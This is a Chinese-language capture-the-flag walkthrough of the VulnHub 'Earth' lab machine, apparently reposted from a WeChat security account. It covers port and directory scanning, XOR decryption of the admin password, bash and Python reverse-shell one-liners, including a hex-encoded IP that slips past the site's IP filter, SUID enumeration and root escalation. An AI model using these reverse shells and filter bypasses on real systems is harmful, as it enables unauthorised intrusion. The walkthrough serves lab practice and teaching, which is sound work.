VulnHub靶场Earth

admin
admin
admin
139009
文章
114
评论
2025年2月16日00:33:56评论4 views字数 6678阅读22分15秒阅读模式

VulnHub靶场Earth

攻击机IP:192.168.0.110

虚拟机开启前要把USB关掉,否则虚拟机打不开

目标地址扫描:sudo nmap -sP 192.168.0.1/24

结果:192.168.0.105

端口扫描:sudo nmap -sC -sV -p- 92.168.0.105 -oN Earth

-sC 根据端口识别服务调用默认脚本
-sV 扫描目标主机的端口和软件版本
-p- 1-65535
-oN 将标准输出写入到指定文件中

结果:

22 80 443端口开放

Apache 2.4.51

443:  DNS:earth.local

       DNS:terratest.earth.local

浏览器访问192.168.0.105:80 -> 返回Bad Request(400)

浏览器访问192.168.0.105:443 -> 返回Bad Request(400)

域名绑定 -> 修改hosts:

sudo chmod +x /etc/hosts

sudo vi hosts

192.168.0.105 earth.local terratest.earth.local

浏览器访问

http://earth.local

打开可以看到地球页面,页面下方有三串数字

37090b59030f11060b0a1b4e0000000000004312170a1b0b0e4107174f1a0b044e0a000202134e0a161d17040359061d43370f15030b10414e340e1c0a0f0b0b061d430e0059220f11124059261ae281ba124e14001c06411a110e00435542495f5e430a0715000306150b0b1c4e4b5242495f5e430c07150a1d4a410216010943e281b54e1c0101160606591b0143121a0b0a1a00094e1f1d010e412d180307050e1c17060f43150159210b144137161d054d41270d4f0710410010010b431507140a1d43001d5903010d064e18010a4307010c1d4e1708031c1c4e02124e1d0a0b13410f0a4f2b02131a11e281b61d43261c18010a43220f1716010d40
    3714171e0b0a550a1859101d064b160a191a4b0908140d0e0d441c0d4b1611074318160814114b0a1d06170e1444010b0a0d441c104b150106104b1d011b100e59101d0205591314170e0b4a552a1f59071a16071d44130f041810550a05590555010a0d0c011609590d13430a171d170c0f0044160c1e150055011e100811430a59061417030d1117430910035506051611120b45
    2402111b1a0705070a41000a431a000a0e0a0f04104601164d050f070c0f15540d1018000000000c0c06410f0901420e105c0d074d04181a01041c170d4f4c2c0c13000d430e0e1c0a0006410b420d074d55404645031b18040a03074d181104111b410f000a4c41335d1c1d040f4e070d04521201111f1d4d031d090f010e00471c07001647481a0b412b1217151a531b4304001e151b171a4441020e030741054418100c130b1745081c541c0b0949020211040d1b410f090142030153091b4d150153040714110b174c2c0c13000d441b410f13080d12145c0d0708410f1d014101011a050d0a084d540906090507090242150b141c1d08411e010a0d1b120d110d1d040e1a450c0e410f090407130b5601164d00001749411e151c061e454d0011170c0a080d470a1006055a010600124053360e1f1148040906010e130c00090d4e02130b05015a0b104d0800170c0213000d104c1d050000450f01070b47080318445c090308410f010c12171a48021f49080006091a48001d47514c50445601190108011d451817151a104c080a0e5a

http://terratest.earth.local/   Test site,please ignore

接下来进行目录扫描:

gobuster dir -u http://earth.local -w /usr/share/dirb/wordlists/big.txt -x .php,.txt,.zip -k

扫到一个/admin目录,点进去有一个登陆界面,需要账号密码

继续扫描terratest.earth.local的目录:

gobuster dir -u https://terratest.earth.local -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x .php,.txt,.zip -k

发现/robots.txt -> 浏览器打开https://terratest.earth.local/robots.txt

最下面有一个/testingnotes.* 猜后缀,访问得到一串描述:

Testing secure messaging system notes:
*Using XOR encryption as the algorithm, should be safe as used in RSA.
*Earth has confirmed they have received our sent messages.
*testdata.txt was used to test encryption.
*terra used as username for admin portal.
Todo:
*How do we send our monthly keys to Earth securely? Or should we change keys weekly?
*Need to test different key lengths to protect against bruteforce. How long should the key be?
*Need to improve the interface of the messaging interface and the admin panel, it's currently very basic.

根据提示:使用异或加密算法,testdata.txt,terra是登录账号

浏览器访问testdata.txt -> 一串冠以地球的描叙信息  -> 下载

wget https://terratest.earth.local.testdata.txt --no-check-certificate

编写python脚本进行异或解码:

import binascii
key = "2402111b1a0705070a41000a431a000a0e0a0f04104601164d050f070c0f15540d1018000000000c0c06410f0901420e105c0d074d04181a01041c170d4f4c2c0c13000d430e0e1c0a0006410b420d074d55404645031b18040a03074d181104111b410f000a4c41335d1c1d040f4e070d04521201111f1d4d031d090f010e00471c07001647481a0b412b1217151a531b4304001e151b171a4441020e030741054418100c130b1745081c541c0b0949020211040d1b410f090142030153091b4d150153040714110b174c2c0c13000d441b410f13080d12145c0d0708410f1d014101011a050d0a084d540906090507090242150b141c1d08411e010a0d1b120d110d1d040e1a450c0e410f090407130b5601164d00001749411e151c061e454d0011170c0a080d470a1006055a010600124053360e1f1148040906010e130c00090d4e02130b05015a0b104d0800170c0213000d104c1d050000450f01070b47080318445c090308410f010c12171a48021f49080006091a48001d47514c50445601190108011d451817151a104c080a0e5a
testdata = binascii.b2a_hex(open('testdata.txt','rb').read()).decode()
print(hex(int(key,16) ^ int(testdata,16)))

得到结果:

0x6561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174

发现是6561727468636c696d6174656368616e67656261643468756d616e73一直在循环,通过在线十六进制转文本:earthclimatechangebad4humans

回到http://earth.local/admin中,使用terra + earthclimatechangebad4humans可以成功登录,是一个webshell,可以执行系统命令

find / -name "*flag *"  查找flag相关文件 -> /var/earth_web/user_flag.txt

cat /var/earth_web/user_flag.txt  -> user_flag_3353b67d6437f07ba7d34afd7d2fc27d

反弹shell:

bash -i >& /dev/tcp/192.168.0.100/1234 0>&1  --> Remote connections are forbidden

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.0.100",1234));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'  -->  去掉输入长度限制,同上,禁止远程连接

ls命令查看文件 -> /var/earth_web -> secure_message -> forms.py -> 对IP进行了过滤

使用十六进制对ip地址进行编码:192.168.0.110 -> 0xc0.0xa8.0x00.0x6e

bash -i >& /dev/tcp/0xc0.0xa8.0x00.0x6e/1234 0>&1

成功反弹shell

find / -perm -u=s -type f 2>/dev/null  ->  查找有权限的文件

find / -perm -u=s -type f 2>/dev/null
find / -perm /u=s -type f 2>/dev/null
-perm 按权限查找 ugo(用户/组/其他) rwx(读/写/执行) 
S 为SUID/SGID特殊权限
-type 文件类型f->文件  d->文件夹
2>/dev/null 不显示错误信息 2->错误输出(0->标准输入; 1->标准输出) >(先清除再写入) or >>(追加) /dev/null位桶(黑洞),接受到的任何数据都会被丢弃

发现/usr/bin/reset_root好像可以提权

reset_root直接执行一下,报错,发送到kali上分析一下

kali(root): nc -nlvp 1234 >reset_boot

shell: nc 192.168.0.110 1234 < /usr/bin/reset_root

kali: strace /home/kali/reset_root  -> reset_root没有执行权限,需要添加

access("/dev/shm/kHgTFI5G", F_OK)       = -1 ENOENT (No such file or directory)access("/dev/shm/Zw7bV9U5", F_OK)       = -1 ENOENT (No such file or directory)access("/tmp/kcM0Wewe", F_OK)           = -1 ENOENT (No such file or directory)

shell中添加三个文件:

touch /dev/shm/kHgTFI5G

touch /dev/shm/Zw7bV9U5

touch /tmp/kcM0Wewe

shell中执行reset_root  -> 显示root密码Earth

su  ->  Password:Earth  -> 获取到root权限

cd /root  -> cat root_flag.txt   -> 成功获取flag

VulnHub靶场Earth
pluck靶机介绍
VulnHub-FristiLeaks: 1.3-Walkthrough
VulnHub-PwnLab-Walkthrough
VulnHub靶场Jangow01

VulnHub靶场Earth

原文始发于微信公众号(北京路劲科技有限公司):VulnHub靶场Earth

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年2月16日00:33:56
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   VulnHub靶场Earthhttp://cn-sec.com/archives/906141.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息